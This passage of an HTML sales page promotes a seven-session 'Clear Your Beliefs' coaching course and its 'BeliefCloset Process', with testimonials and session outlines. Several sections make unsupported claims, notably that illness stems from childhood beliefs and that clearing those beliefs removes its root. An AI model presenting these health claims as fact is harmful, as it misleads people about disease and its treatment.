of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n\r\n&nbsp;\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div 